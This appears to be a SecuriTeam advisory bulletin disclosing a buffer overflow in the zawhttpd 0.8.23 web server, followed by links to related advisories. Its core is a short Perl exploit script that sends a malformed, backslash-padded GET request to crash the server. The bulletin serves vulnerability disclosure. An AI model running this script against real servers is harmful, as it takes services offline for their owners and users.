[EXPL] zawhttpd Buffer Overflow (Exploit)

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

zawhttpd Buffer Overflow (Exploit)

SUMMARY

" <http://www.norz.org/zawhttpd.html> zawhttpd is a small http server."

Improper handling of HTTP headers allows attackers to cause a buffer
overflow and execute arbitrary code or crash zawhttpd.

DETAILS

Vulnerable Systems:
* zawhttpd version 0.8.23

Exploit:
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
close($socket);
}
else
{
print "perl zawhttpd.pl localhost 80 \n";
print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
#EoF

ADDITIONAL INFORMATION

The information has been provided by ">Kamil 'K3' Sienicki.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] TinyWeb Server DoS Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] 3Com FTP Server Buffer Overflow (CD)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Automagic SQL Injector
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] SHELL32.DLL Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... As a user browses through his hard-drive, Windows automatically analyses ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)